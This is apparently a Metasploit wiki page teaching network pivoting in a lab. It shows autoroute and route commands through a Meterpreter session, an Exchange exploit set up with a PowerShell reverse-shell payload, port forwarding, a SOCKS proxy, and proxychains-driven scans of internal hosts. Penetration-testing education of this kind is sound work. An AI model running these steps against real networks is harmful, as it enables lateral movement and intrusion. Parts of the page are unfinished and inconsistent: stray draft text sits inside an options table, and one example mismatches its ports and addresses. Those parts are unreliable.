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Pivoting in Metasploit
Whilst in test environments one is often looking at flat networks that only have one subnet and one network environment, the reality is that when it comes to pentests that are attempting to compromise an entire company, you will often have to deal with multiple networks, often with switches or firewalls in-between that are intended to keep these networks separate from one another.
In order for pivoting to work, you must have compromised a host that is connected to two or more networks. This usually means that the host has two or more network adapters, whether that be physical network adapters, virtual network adapters, or a combination of both.
Once you have compromised a host that has multiple network adapters you can then use the session that you have obtained on that host to use that host as a pivot, and relay traffic through the compromised host to the target machine that you want to access. This allows you, as an attacker, to access machines on networks that you might not otherwise have access to, by utilizing the access to internal networks that the compromised machine has.
Now that we understand some of the background, lets see this in action a bit more by setting up a sample environment and walking through some of Metasploit's pivoting features.
Pivoting functionality is provided by all Meterpreter and SSH sessions that occur over TCP channels. Whilst Meterpreter is mentioned below, keep in mind that this would also work with an SSH session as well. We have just resorted to using Meterpreter for this example for demonstration purposes.
- Kali Machine
- Internal: None
- External: 172.19.182.171
- Windows 11 Machine (used as pivot)
- Internal: 169.254.16.221
- External: 172.19.185.34
- Windows Server 2019 Machine (final target)
- Internal: 169.254.204.110
- External: None
For the purpose of simplicity we will assume we have a session on the Windows 11 box, which we will use as a pivot to route our traffic through to the Windows Server 2019 box at 169.254.204.110.
There a few ways to register this route in Metasploit so that it knows how to redirect traffic appropriately. Lets take a look at these methods.
One of the easiest ways to do this is to use the post/multi/manage/autoroute
module which will help us automatically add in routes for the target to Metasploit's routing table so that Metasploit knows how to route traffic through the session that we have on the Windows 11 box and to the target Windows Server 2019 box. Lets look at a sample run of this command:
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > show options
Module options (post/multi/manage/autoroute):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD autoadd yes Specify the autoroute command (Accepted: add, auto
add, print, delete, default)
NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
SESSION yes The session to run this module on
SUBNET no Subnet (IPv4, for example, 10.10.10.0)
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 169.254.0.0
SUBNET => 169.254.0.0
msf6 post(multi/manage/autoroute) > set NETMASK /16
NETMASK => /16
msf6 post(multi/manage/autoroute) > show options
Module options (post/multi/manage/autoroute):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD autoadd yes Specify the autoroute command (Accepted: add, auto
add, print, delete, default)
NETMASK /16 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
SESSION 1 yes The session to run this module on
SUBNET 169.254.0.0 no Subnet (IPv4, for example, 10.10.10.0)
msf6 post(multi/manage/autoroute) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows
[*] Running module against WIN11-TEST
[*] Searching for subnets to autoroute.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 172.19.176.0/255.255.240.0 from host's routing table.
[*] Post module execution completed
msf6 post(multi/manage/autoroute) >
If we now use Meterpreter's route
command we can see that we have two route table entries within Metasploit's routing table, that are tied to Session 1, aka the session on the Windows 11 machine. This means anytime we want to contact a machine within one of the networks specified, we will go through Session 1 and use that to connect to the targets.
msf6 post(multi/manage/autoroute) > route
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
169.254.0.0 255.255.0.0 Session 1
172.19.176.0 255.255.240.0 Session 1
[*] There are currently no IPv6 routes defined.
msf6 post(multi/manage/autoroute) >
All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do route flush
followed by route
to double check we have successfully removed the entires.
msf6 post(multi/manage/autoroute) > route flush
msf6 post(multi/manage/autoroute) > route
[*] There are currently no routes defined.
msf6 post(multi/manage/autoroute) >
Now lets trying doing the same thing manually.
Here we can use route add <IP ADDRESS OF SUBNET> <NETMASK> <GATEWAY>
to add the routes from within Metasploit, followed by route print
to then print all the routes that Metasploit knows about. Note that the Gateway parameter is either an IP address to use as the gateway or as is more commonly the case, the session ID of an existing session to use to pivot the traffic through.
msf6 post(multi/manage/autoroute) > route add 169.254.0.0 255.255.0.0 1
[*] Route added
msf6 post(multi/manage/autoroute) > route add 172.19.176.0 255.255.240 1
[-] Invalid gateway
msf6 post(multi/manage/autoroute) > route add 172.19.176.0 255.255.240.0 1
[*] Route added
msf6 post(multi/manage/autoroute) > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
169.254.0.0 255.255.0.0 Session 1
172.19.176.0 255.255.240.0 Session 1
[*] There are currently no IPv6 routes defined.
msf6 post(multi/manage/autoroute) >
Finally we can check that the route will use session 1 by using route get 169.254.204.110
msf6 post(multi/manage/autoroute) > route get 169.254.204.110
169.254.204.110 routes through: Session 1
msf6 post(multi/manage/autoroute) >
If we want to then remove a specific route (such as in this case we want to remove the 172.19.176.0/20 route since we don't need that for this test), we can issue the route del
or route remove
commands with the syntax route remove <IP ADDRESS OF SUBNET><NETMASK IN SLASH FORMAT> <GATEWAY>
Example:
msf6 post(multi/manage/autoroute) > route remove 172.19.176.0/20 1
[*] Route removed
msf6 post(multi/manage/autoroute) > route
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
169.254.0.0 255.255.0.0 Session 1
[*] There are currently no IPv6 routes defined.
msf6 post(multi/manage/autoroute) >
At this point we can now use the pivot with any Metasploit modules as shown below:
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword thePassword yes The password to use to authenticate to the Ex
change server
HttpUsername administrator yes The username to log into the Exchange server
as
Proxies no A proxy chain of format type:host:port[,type:
host:port][...]
RHOSTS 169.254.204.110 yes The target host(s), see https://github.com/ra
pid7/metasploit-framework/wiki/Using-Metasplo
it
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yTo come, awaiting some more testing hold on :)es The local host or network interface to listen
on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is r
andom)
VHOST no HTTP server virtual host
Payload options (cmd/windows/powershell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.19.182.171 yes The listen address (an interface may be speci
fied)
LOAD_MODULES no A list of powershell modules separated by a c
omma to download over the web
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Command
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > check
[*] Target is an Exchange Server!
[*] 169.254.204.110:443 - The target is not exploitable. Exchange Server 15.2.986.14 does not appear to be a vulnerable version!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) >
Note: This method is discouraged as you can only set up a mapping between a single port and another target host and port, so using the socks module below is encouraged where possible. Additionally this method has been depreciated for some time now.
To set up a port forward using Metasploit, use the portfwd
command within a supported session's console such as the Meterpreter console. Using portfwd -h
will bring up a help menu similar to the following:
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-h Help banner.
-i Index of the port forward entry to interact with (see the "list" command).
-l Forward: local port to listen on. Reverse: local port to connect to.
-L Forward: local host to listen on (optional). Reverse: local host to connect to.
-p Forward: remote port to connect to. Reverse: remote port to listen on.
-r Forward: remote host to connect to.
-R Indicates a reverse port forward.
meterpreter >
To add a port forward, use portfwd add
and specify the -l
, -p
and -r
options at a minimum to specify the local port to listen on, the report port to connect to, and the target host to connect to respectively.
meterpreter > portfwd add -l 1090 -p 443 -r 169.254.37.128
[*] Local TCP relay created: :1090 <-> 169.254.37.128:443
meterpreter >
Note that something that is commonly misunderstood here is that the port will be opened on the machine running Metasploit itself, NOT on the target that the session is running on.
We can then connect to the target host using the local port on the machine running Metasploit:
~/git/metasploit-framework │ master ?21 wget --no-check-certificate https://127.0.0.1:1090
--2022-04-08 14:36:23-- https://127.0.0.1:1090/
Connecting to 127.0.0.1:1090... connected.
WARNING: cannot verify 127.0.0.1's certificate, issued by ‘CN=DC1’:
Self-signed certificate encountered.
WARNING: certificate common name ‘DC1’ doesn't match requested host name ‘127.0.0.1’.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://127.0.0.1/owa/ [following]
--2022-04-08 14:36:23-- https://127.0.0.1/owa/
Connecting to 127.0.0.1:443... failed: Connection refused.
~/git/metasploit-framework │ master ?21
Note that you may need to edit your /etc/hosts
file to map IP addresses to given host names to allow things like redirects to redirect to the right hostname or IP address when using this method of pivoting.
Can list port forwards using the portfwd list
command. To delete all port forwards use portfwd flush
. Alternatively to selectively delete local port forwarding entries, use portfwd delete -l <local port>
.
meterpreter > portfwd delete -l 1090
[*] Successfully stopped TCP relay on 0.0.0.0:1090
meterpreter > portfwd list
No port forwards are currently active.
meterpreter >
This scenario is a bit different than above. Whereas previously we were instructing the session to forward traffic from our host running Metasploit, through the session, and to a second target host, with reverse port forwarding the scenario is a bit different. In this case we are instructing the session to forward traffic from other hosts through the session, and to our host running Metasploit. This is useful for allowing other applications running within a target network to interact with local applications on the machine running Metasploit.
To set up a reverse port forward, use portfwd add -R
within a supported session and then specify the -l
, -L
and -p
options. The -l
option specifies the port to forward the traffic to, the -L
option specifies the IP address to forward the traffic to, and the -p
option specifies the port to listen on for traffic on the machine that we have a session on (whose session console we are currently interacting with).
For example to listen on port 9093 on a target session and have it forward all traffic to the Metasploit machine at 172.20.97.72 on port 9093 we could execute portfwd add -R -l 4444 -L 172.20.97.73 -p 9093
as shown below, which would then cause the machine who have a session on to start listening on port 9093 for incoming connections.
meterpreter > portfwd add -R -l 4444 -L 172.20.97.73 -p 9093
[*] Local TCP relay created: 172.20.97.73:4444 <-> :9093
meterpreter > netstat -a
Connection list
===============
Proto Local addre Remote addr State User Inode PID/Program name
ss ess
----- ----------- ----------- ----- ---- ----- ----------------
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 488/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:504 0.0.0.0:* LISTEN 0 0 5780/svchost.exe
0
tcp 0.0.0.0:909 0.0.0.0:* LISTEN 0 0 2116/bind_tcp_x64_4444.exe
3
We can confirm this works by setting up a listener
XXX - to work on and confirm....
Once routes are established, Metasploit modules can access the IP range specified in the routes. For other applications to access the routes, a little bit more setup is necessary. One way to solve this involves using the auxiliary/server/socks_proxy
Metasploit module to set up a socks4a proxy, and then using proxychains-ng
to direct external applications towards the established socks4a proxy server that Metasploit has set up so that external applications can use Metasploit's internal routing table.
Metasploit can launch a SOCKS proxy server using the module: auxiliary/server/socks_proxy
. When set up to bind to a local loopback adapter, applications can be directed to use the proxy to route TCP/IP traffic through Metasploit's routing tables. Here is an example of how this module might be used:
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST 0.0.0.0 yes The local host or network interface to listen on.
This must be an address on the local machine or
0.0.0.0 to listen on all addresses.
SRVPORT 1080 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
SRVPORT => 1080
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Auxiliary: server/socks_proxy
msf6 auxiliary(server/socks_proxy) >
First, make sure that you have installed proxychains-ng
. You can also use proxychains
however most repositories such as Ubuntu will have an outdated version of it and it has crashed before in my tests, so it is highly recommended to use proxychains-ng
instead which is actively maintained. You can install it with the following commands:
git clone https://github.com/rofl0r/proxychains-ng
cd proxychains-ng
make
sudo make install
Now edit the proxychains
configuration file located at /etc/proxychains.conf
. Add the below line to the end of the file to set proxychains-ng
to use the SOCKS 5 server that you just set up. Note that you may need to use sudo
to edit this file due to the default permissions on this file preventing anyone but root
from writing to it.
socks5 127.0.0.1 1080
The final final should look something like this:
# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
#
# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)
# Make sense only if random_chain
#chain_len = 2
# Quiet mode (no output from library)
#quiet_mode
# Proxy DNS requests - no leak for DNS data
proxy_dns
# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000
# ProxyList format
# type host port [user pass]
# (values separated by 'tab' or 'blank')
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
Note: If there are other proxy entries in the configuration file, you may need to comment them out as they may interfere with proper routing.
Now you can combine proxychains-ng with other application like Nmap, Nessus, Firefox and more to scan or access machines and resources through the Metasploit routes. All you need to do is call proxychains-ng before the needed application. No need to change the proxy settings in the respective application.
~/git/metasploit-framework │ master ?21 wget https://169.254.37.128
--2022-04-08 13:52:23-- https://169.254.37.128/
Connecting to 169.254.37.128:443... failed: No route to host.
~/git/proxychains-ng │ master ?1 proxychains4 wget https://169.254.37.128
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/local/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.16-git-1-g07c15a0
--2022-04-08 14:06:52-- https://169.254.37.128/
Connecting to 169.254.37.128:443... [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:443 ... OK
connected.
ERROR: cannot verify 169.254.37.128's certificate, issued by ‘CN=DC1’:
Self-signed certificate encountered.
ERROR: certificate common name ‘DC1’ doesn't match requested host name ‘169.254.37.128’.
To connect to 169.254.37.128 insecurely, use `--no-check-certificate'.
~/git/proxychains-ng │ master ?1 proxychains4 wget --no-check-certificate https://169.254.37.128
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/local/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.16-git-1-g07c15a0
--2022-04-08 14:26:53-- https://169.254.37.128/
Connecting to 169.254.37.128:443... [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:443 ... OK
connected.
WARNING: cannot verify 169.254.37.128's certificate, issued by ‘CN=DC1’:
Self-signed certificate encountered.
WARNING: certificate common name ‘DC1’ doesn't match requested host name ‘169.254.37.128’.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://169.254.37.128/owa/ [following]
--2022-04-08 14:26:53-- https://169.254.37.128/owa/
Connecting to 169.254.37.128:443... [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:443 ... OK
connected.
WARNING: cannot verify 169.254.37.128's certificate, issued by ‘CN=DC1’:
Self-signed certificate encountered.
WARNING: certificate common name ‘DC1’ doesn't match requested host name ‘169.254.37.128’.
HTTP request sent, awaiting response... 302 Found
Location: https://169.254.37.128/owa/auth/logon.aspx?url=https%3a%2f%2f169.254.37.128%2fowa%2f&reason=0 [following]
--2022-04-08 14:26:54-- https://169.254.37.128/owa/auth/logon.aspx?url=https%3a%2f%2f169.254.37.128%2fowa%2f&reason=0
Reusing existing connection to 169.254.37.128:443.
HTTP request sent, awaiting response... 200 OK
Length: 58714 (57K) [text/html]
Saving to: ‘index.html’
index.html 100%[===========================>] 57.34K --.-KB/s in 0.1s
2022-04-08 14:26:54 (573 KB/s) - ‘index.html’ saved [58714/58714]
~/git/proxychains-ng │ master ?2
For scanning with Nmap, Zenmap, Nessus and others, keep in mind that ICMP and UPD traffic cannot tunnel through the proxy. So you cannot perform ping or UDP scans.
For Nmap and Zenmap, the below example shows the commands can be used. It is best to be selective on ports to scan since scanning through the proxy tunnel can be slow.
$ sudo proxychains4 nmap -n -sT -sV -PN -p 445 10.10.125.0/24
Here is an example of how this might look when scanning a single host for port 445 over proxychains-ng
:
~/git/proxychains-ng │ master ?1 proxychains4 nmap -n -sT -A -PN -p 445 169.254.37.128
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/local/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.16-git-1-g07c15a0
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-08 14:08 CDT
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:7458 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:42597 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:1433 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK
Nmap scan report for 169.254.37.128
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
Host script results:
|_clock-skew: -1s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-04-08T19:09:38
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.03 seconds
- Home Welcome to Metasploit!
- Using Metasploit A collection of useful links for penetration testers.
-
Setting Up a Metasploit Development Environment From
apt-get install
togit push
. - CONTRIBUTING.md What should your contributions look like?
- Landing Pull Requests Working with other people's contributions.
- Using Git All about Git and GitHub.
- Contributing to Metasploit Be a part of our open source community.
- Meterpreter All about the Meterpreter payload.